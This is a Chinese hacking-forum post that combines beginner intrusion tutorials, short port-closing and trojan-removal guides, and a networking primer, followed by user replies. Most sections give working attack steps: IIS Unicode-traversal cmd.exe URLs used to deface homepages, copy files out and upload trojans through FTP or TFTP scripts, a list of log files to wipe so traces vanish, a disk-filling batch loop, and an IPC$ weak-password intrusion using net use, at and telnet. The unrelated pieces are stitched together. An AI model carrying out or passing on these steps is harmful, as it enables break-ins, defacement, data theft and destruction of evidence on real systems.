w32tm.exe > windows time server 时间服务器

wextract.exe > used to extract windows files 解压缩windows文件

winchat.exe > opens windows chat 打开windows聊天

首先我们我们要找一台主机来练手,随便挑吧![url]www.flyingfish.com/url第一部,呵呵, 先在ie里看看吧,mmmm…做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后, 我们应该知道它的ip,很简单,ping它一下就可以了。ping http://www.flyingfish.com,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙禁止ping,不过这种可能很小。知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值

21–ftp 重要哦

23–telnet 欢呼吧

25-smtp 尽管重要,但似乎没什么可利用的 53–domain 同上

79–finger 可知道用户信息了

80–http 要看网页,没它不行吧

110–pop 收信的

139–netbios 共享用的,很有利用价值哦

3389–win2000超级终端 呵呵,这个好!

其实端口有上千种,这些最最常用我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)那么我们该如何应对呢?ps:忘了说一声,顺便扫一下7626,冰河有也说不准哦:)

若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级白痴:)随便猜个,错了,闪人!

二,一切从基础开始

由于winntsystem32cmd.exe的存在,使远程执行命令变为可能,在浏览器里输入以下请求:(假设11.11.22.22有漏洞) 11.11.22.22/scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+dir

学过dos的应该可以看懂,其实就是利用当中的非法请求使我们可以连到system32下,如果inetpub目录不合winnt同盘,或者目录级数有改动,可能会引起请求失败。

如果成功,那么在浏览区可看到如下信息:

Directory of C:inetpubscripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 … (假设目录中没有文件,实际上有一大堆)

是不是有自己机器的感觉了,正点!就是这种感觉!

cmd.exe相当与dos里的command.com,因此,我们可以执行很多命令了!

http://11.11.22.22/msadc/…t/system32/cmd.exe?/c+dir (这个命令同样道理)

大家请注意:/c后面的+,实际上,他就是空格,请记牢!dir开始就是dos命令了,我们可以更改一下:

11.11.22.22/scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+copy+c:autoexec.bat+c:winntauto.exe

会dos的朋友一定懂其意义了,不懂的请去看书 .

不用说,大家也知道我们就可以利用它来对有漏洞的机器展开攻击了!

三,实战演练

1,修改主页!(是不是很爽?)

一般主页位置在c:inetpubwwwroot下,但要是改了路径,就需要找找了。

最方便的方法:在浏览器里输入 http://11.11.22.22/.ida要是有漏洞,那在浏览器里 便会显示主页路径,这个漏洞存在率很高,自然是我们的首选。

分析法:用dir看各个盘符的根目录,看可疑的就进去看,运气好的在一分钟里找到,这要看运气和直觉。

dir/s法:首先在看其主页,找个图片或连接,看它的文件名,比如,11.11.22.22首页上有一幅图片,右击,属性,看到了吗?iloveu.gif,然后我们利用unicode输入这条命令dir c:iloveu.gif /s意味着查找c盘下所有目录里的iloveu.gif,注意实际应用时别忘了把空格改为+,如果没有继续找d盘,很快就能确定主页目录的。default.htm,defautl.html,default.asp中的一个,现在我们确定11.11.22.22中为index.htm 那么我们就修改它吧!

最方便的方法:echo法。echo是一个系统命令,主要用于设置回应开关,而echo cshu >c:autoexe.bat就是把cshu加入autoexec.bat里并删除原有内容,echo cshunice >>c:autoexec.bat 就是加入cshunice但不删除原有内容,这样我们就可以逍遥的改了。

11.11.22.22/scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm 回应为:HTTP 500 - 内部服务器错误 通过对cmd的分析,袁哥得出一条简便的方法,加入"符号
11.11.22.22/scripts/…%c1%1c…/winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm

11.11.22.22/scripts/…%c1%1c…/winnt/system32/cmd".exe?/c+echo+2001730+>>c:inetpubwwwrootindex.htm

回应为:cgi错误,不用理会

两条命令一下,呵呵,再看看11.11.22.22,是不是烙上我们的大名了?不错吧 而在实际操作中,可能袁哥的方法也会失效,这时,我们就可以copy cmd.exe为另一个exe,记住路径,用copy后的来echo

例如:11.11.22.22/scripts/…%c1%1c…/winnt/system32/cmd.exe?/c+copy+cmd.exe+c:a.exe

11.11.22.22/scripts/…%c1%1c…/a.exe?/c+echo+hackedbycshu+>c:inetpubwwwrootindex.htm

2,上传法:echo有点不讲道理,把人家的文件破坏了,要是想在主页上增光添彩,

那就应该用改好的主页上传,这个我们后面介绍。

几点忠告:

1,对于没有主页的机器(就是正在建立的主页),不要改它,这很没水准,也很没道德

2,echo前记得帮他们做好备份

3,不准在主页里加入恶性语句

2,下载文件

要是有什么有用的文件被你发现,那我们如何下载呢? 最简单的方法:把文件copy至网页目录下。copy c:emailbaby.eml c:inetpubwwwrootbaby.zip,然后, 下载11.11.22.22/baby.zip就行了,注意!实际应用中要记得对文件名进行修改,总之不能暴露。 别的方法:对不起,没想好:)

3,最重要的上传

一般方法:ftp法

首先建一个ftp脚本文件:c:hehe.haha(名字乱取把),申请一个ftp账号,然后用echo吧

echo+open ftp.cshu.com(ftp主机) > c:hehe.haha

echo+user yourname >> cc:hehe.haha (yourname是用户名)

echo+yourpasswd >> c:hehe.haha (yourpasswd是密码)

echo+get setup.exe >> c:hehe.haha 要下载的文件

echo+quit >> c:hehe.haha

完了以后:ftp+/s:c:hehe.haha,由于是ftp主机,那么速度一定很快,过一会setup.exe

就会出现在当前目录了(也就是cmd所在目录)

别忘了先上传到ftp主机,不要做马大哈哦!

最简单的方法:tftp法。

这种方法不用中转服务器,首先准备一个tftp服务端,它的作用就是把你的机器做成一个tftp服务器,

利用漏洞机器来下载(注意,运行tftp时不要运行其他的ftp软件)

在这里我推荐cisco tftp server,自己去找找把,实在没有来找我:)

安装好后运行,别忘了设置好默认目录,否则会找不到文件 tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:winntihateu.exe(ihateu.exe在默认目录里) 1.2.3.4为你的ip,用unicode运行一下,会看到tftp server里有反应了,这就好了,不一会,文件就传上去了,方便把! 学会了上传,我们就可以好好改主页,还可以上传木马,还可以把程序放上去运行…………(运行程序和在dos里一样)

4,如何清除痕迹

虽然国内主机纪录ip的不是很多,但万事小心为妙,unicode权限达不到admin。用cleaniislog行不通,就…………直接删吧!

C:winntsystem32logfiles*.*

C:winntssytem32config*.evt

C:winntsystem32dtclog*.*

C:winntsystem32*.log

C:winntsystem32*.txt

C:winnt*.txt

C:winnt*.log

全……擦掉!

四,细节问题。

1,遇到长文件名怎么办?

c:program files

就用c:“program20%files”

2,遇到空格怎么办?

20%代替喽,或者xx yy=xxyy~1

3,如何做个很大的文件?

目的就是破坏啦!我不喜欢不过教教你们啦

@echo off

echo big > c:a.a

:h

copy c:a.a+c:a.a c:a.a

goto h

注意不要乱来啊!

4,输入命令,没反应或反应不对。

:)请检查检查再检查命令的正确性,可能没有漏洞,那就闪人!

看在你看到这里那么给我面子的份上,在给你几个吧!

http://www.exsample.com/m…ystem32/cmd.exe?/c+dir+c:http://www.exsample.com/_vti_bin … 2/cmd.exe?/c+dir+c: 或http://www.exsample.com/_mem_bin … 2/cmd.exe?/c+dir+c:

不一定有用哦!

5,如何找到unicode漏洞的主机

呵呵:)最好的方法自然是………………一个一个ping,一个一个试喽:)

不要打我呀!我说我说。最好找一个cgi扫描器,unicode查找器多如牛毛,随便找个吧!

113端口木马的清除(仅适用于windows系统):
这是一个基于irc聊天室控制的木马程序。
1.首先使用netstat -an命令确定自己的系统上是否开放了113端口
2.使用fport命令察看出是哪个程序在监听113端口
fport工具下载
例如我们用fport看到如下结果:
Pid Process Port Proto Path
392 svchost -> 113 TCP C:\WINNT\system32\vhos.exe

我们就可以确定在监听在113端口的木马程序是vhos.exe而该程序所在的路径为c:\winnt\system32下。
3.确定了木马程序名(就是监听113端口的程序)后,在任务管理器中查找到该进程, 并使用管理器结束该进程。
4.在开始-运行中键入regedit运行注册表管理程序,在注册表里查找刚才找到那个程序, 并将相关的键值全部删掉。
5.到木马程序所在的目录下删除该木马程序。(通常木马还会包括其他一些程序,如rscan.exe、psexec.exe、ipcpass.dic、ipcscan.txt等,根据
木马程序不同,文件也有所不同,你可以通过察看程序的生成和修改的时间来确定与监听113端口的木马程序有关的其他程序)
6.重新启动机器。

3389端口的关闭:
首先说明3389端口是windows的远程管理终端所开的端口,它并不是一个木马程序,请先确定该服务是否是你自己开放的。如果不是必须的,请关闭该服务。

win2000关闭的方法:
win2000server 开始–>程序–>管理工具–>服务里找到Terminal Services服务项,选中属性选项将启动类型改成手动,并停止该服务。
win2000pro 开始–>设置–>控制面板–>管理工具–>服务里找到Terminal Services 服务项,选中属性选项将启动类型改成手动,并停止该服务。
winxp关闭的方法:
在我的电脑上点右键选属性–>远程,将里面的远程协助和远程桌面两个选项框里的勾去掉。

4899端口的关闭:
首先说明4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的,请先确定该服务是否是你自己开放并且是必需的。如果不是请关闭它。

关闭4899端口:
请在开始–>运行中输入cmd(98以下为command),然后cd C:\winnt\system32(你的系统安装目录),输入r_server.exe /stop后按回车。
然后在输入r_server /uninstall /silence 到C:\winnt\system32(系统目录)下删除r_server.exe admdll.dll radbrv.dll三个文件

5800,5900端口:
1.首先使用fport命令确定出监听在5800和5900端口的程序所在位置(通常会是c:\winnt\fonts\ explorer.exe)
2.在任务管理器中杀掉相关的进程(注意有一个是系统本身正常的,请注意!如果错杀可以重新运行c:\winnt\explorer.exe)
3.删除C:\winnt\fonts\中的explorer.exe程序。
4.删除注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run中的Explorer项。
5.重新启动机器。

6129端口的关闭:
首先说明6129端口是一个远程控制软件(dameware nt utilities)服务端监听得端口,他不是一个木马程序,但是具有远程控制功能,通常的杀毒软件是无法查出它来的。请先确定该服务是否是你自己安装并且是必需的,如果不是请关闭。

关闭6129端口:
选择开始–>设置–>控制面板–>管理工具–>服务 找到DameWare Mini Remote Control项点击右键选择属性选项,将启动类型改成禁用后停止该服务。
到c:\winnt\system32(系统目录)下将DWRCS.EXE程序删除。
到注册表内将HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DWMRCS表项删除。

1029端口和20168端口:

这两个端口是lovgate蠕虫所开放的后门端口。
蠕虫相关信息请参见:Lovgate蠕虫:http://it.rising.com.cn/newSite/ … rus/Antivirus_Base/TopicExplorerPagePackage/lovgate.htm
你可以下载专杀工具:http://it.rising.com.cn/service/ … ovGate_download.htm
使用方法:下载后直接运行,在该程序运行结束后重起机器后再运行一遍该程序。

45576端口:

这是一个代理软件的控制端口,请先确定该代理软件并非你自己安装(代理软件会给你的机器带来额外的流量)

关闭代理软件:
1.请先使用fport察看出该代理软件所在的位置
2.在服务中关闭该服务(通常为SkSocks),将该服务关掉。
3.到该程序所在目录下将该程序删除。
对于139端口攻击的防范针对不同系统的设置也有所不同,下面就来分别描述。
针对使用Windows 9x系统拨号上网用户,可以不必登录到NT局域网络环境,打开控制面板,然后双击“网络”图标,在“主网络登录”中选择“Microsoft友好登录”,不必选择“Windows网络用户”方式。此外,也不必设置“文件打印共享” 对于Windows NT用户,可以取消NetBIOS与TCP/IP协议的绑定,打开“控制面板”,然后双击“网络”图标,在“NetBIOS接口”中选择“WINS客户(TCP/IP)”为“禁用”,并重新启动计算机即可。

Windows 2000用户可以使用鼠标右键单击“网络邻居”图标,然后选择“属性”命令,打开“网络和拨号连接”对话框,用鼠标右键单击“本地连接”图标,然后执行“属性”命令,打开“本地连接属性”对话框。双击“Internet协议(TCP/IP)”,在打开的对话框中单击[高级]按钮。打开“高级TCP/IP设置”对话框,选择“选项”选项卡,在列表中单击选中“TCP/IP筛选”选项单击[属性]按钮,在“只允许”单击[添加]按钮,填入除了139之外要用到的端口。
对于个人上网用户可以使用“天网防火墙”定制防火墙规则。启动“天网个人防火墙”,选择一条空规则,设置数据包方向为“接收”,对方IP地址选“任何地址”,协议设定为“TCP”,本地端口设置为“139到139”,对方端口设置为“0到0”,设置标志位为“SYN”,动作设置为“拦截”,最后单击[确定]按钮,并在“自定义IP规则”列表中勾选此规则即可启动拦截139端口攻击了.

一、协议:
网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换,这种物理设备包括最常见的电缆、光缆、无线WAP和微波等,但是单纯拥有这些物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。

这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机理的目的。

每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全问题而被黑客利用。

对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。

二、服务器与客户端:
最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持,而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它们之间具有相同的功能,对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。

从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。

三、系统与系统环境:
电脑要运作必须安装操作系统,如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些操作系统各自独立运行,它们有自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。

不同的操作系统配合不同的应用程序就构成了系统环境,例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息;再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器,通过远程ftp登陆可以获得系统上的各种文件资源等。

四、IP地址和端口:
我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目,都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。

每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地址)的请求后,服务器会将应答信息传送到伪IP地址上,从而造成网络的混乱。当然,黑客也可以根据IP地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。

接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户端请求。

网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现,即“隐藏的端口”,故“后门”。
每一台电脑都可以打开65535个端口,因而理论上我们可以开发出至少65535种不同的网络服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客户端和服务端都使用的是80号端口,进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。

五、漏洞:
漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号;Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或者程序的时候,没有预先保留出足够的资源,而在曰后使用程序是造成的资源不足;特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等……

总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”,他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才对黑客有了畏惧和敌视的心理。

六、加密与解密:
在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到,如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。

网络上最长使用的是设置个人密码、使用DES加密锁,这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷,黑客也在寻找破解这些系统的种种办法。

可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好,将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行,本书将会侧重学习“漏洞”方面的知识。

七、特洛伊木马:
特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊木马与病毒区分开。

前言:

你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\操作系统拜托你装个2000的好不好?不要再问为什么了~\(本文注释用"\注释内容\"标记!

第一节课:命令的使用

你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧!

1.net

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

上面就是net命令.你可以在cmd下键入net/?获得.我们看看一些常用的.

net user \列举所有用户\ 例子:c:>net user

net localgroup \把用户分组\ 例子:c:>net localgroup administrators guest /add \把guest用户加到管理组.需要有足够的权限才能进行操作!\

net share \显示共享资源\ 例子:c:>net share

net start \启动服务,或显示已启动服务的列表\ 例子:>net start 例子:>net start telnet \启动telnet\

net stop \停止Windows2000网络服务\ 例子c:>net stop telnet \停止telnet服务\

net time \显示时间\ 例子:c:>net time 127.0.0.1 \显示127.0.0.1的时间\

net use \显示关于计算机连接的信息\ 例子:c:>net use

net view \显示域列表、计算机列表或者由指定计算机共享的资源\ 例子:c:>net view

net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)课程需要用的命令是这些而已~自己去windows帮助那里看看吧!DOS下的基本命令是很重要的!如:copy等.还有ftp等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!!!)好了~下课~

第二节课:端口和木马

A.第二节课了~这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们看网页用的实际上是80端口.

1)、telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机.
2)、WWW(80/TCP)端口
它表明WWW服务在该端口运行
别告诉我你不知道WWW服务是什么哦,也就是说,如果有网站的服务器都有80端口。
3)、FTP(21/tcp)
ftp服务和TELNET服务一样,你还可以从FTP服务器上获得或上传资料木马等,有的还是匿名登陆的,不过这样的好事好像不多。
4)、finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。
5)、远程控制(3389)
这个端口用于远程登陆.

还有一些常见的端口例如110,135,139,25等等等…我们这次基础教程需要用到的是23端口.其它的因为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题!请谅解!)PS:并不是所有的端口都是有用的.

B.木马

讲个故事给大家听吧!---->>传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。

木马的危害性是很大的!例如冰河等木马甚至可以远程控制你的电脑!同时木马也会打开一些端口.你也可以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了~ \我们的课程并不需要使用到木马.只是本人认为各位值得一学\

第三节课:ipc入侵.

好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你的AK-47,我们不需要那个家伙…

A.什么是ipc?

IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。

B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?

需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上K了你!)

首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)

假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识…)

打开cmd,输入:net use \127.0.0.1\ipc$ “” /user:“Administrator” 命令成功完成.OK!下一步~

at \127.0.0.1 \这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\

接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容net start telnet 然后保存为a.bat \注意扩展名!是bat!\

编辑好后就继续吧! copy a.bat \127.0.0.1\admin$ \admin$就是放在目标winnt的根目录下\

net time \127.0.0.1 \看看目标的时间吧!有用的~\

假设是晚上9点.接着下一步吧!

at \127.0.0.1 20:01 a.bat \用AT命令让目标运行a.bat.注意时间要24小时制的!\

net time \127.0.0.1 \看看到时间没?\

假设到了,我们就实行下一步吧!

telnet 127.0.0.1 \登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\

接着输入用户名和密码 \就是用户Administrator啊!密码是空的.回车就行了~\

OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)

请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.

---------------基础课程<完>

好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了~

謝謝分享哦,在此加10分作為獎勵 [s:23]

谢谢分享。受益无穷。 [s:2]

这些都是一些基本的电脑知识把了..不过也谢谢你的分享.

看了,但是还是不会hack人。

啊啊哈哈哈哈。。。